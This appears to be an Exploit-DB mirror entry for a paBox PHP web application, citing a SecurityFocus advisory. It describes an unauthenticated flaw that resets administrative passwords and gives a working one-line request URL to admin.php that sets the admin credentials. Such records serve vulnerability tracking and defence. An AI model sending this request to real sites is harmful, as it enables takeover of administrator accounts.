exploit-db-mirror/exploits/php/webapps/22845.txt

source: http://www.securityfocus.com/bid/8067/info

paBox is prone to an issue that may allow unauthenticated remote users to reset administrative passwords. This could permit unauthorized access to the administrative Control Panel.

http://www.example.com/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin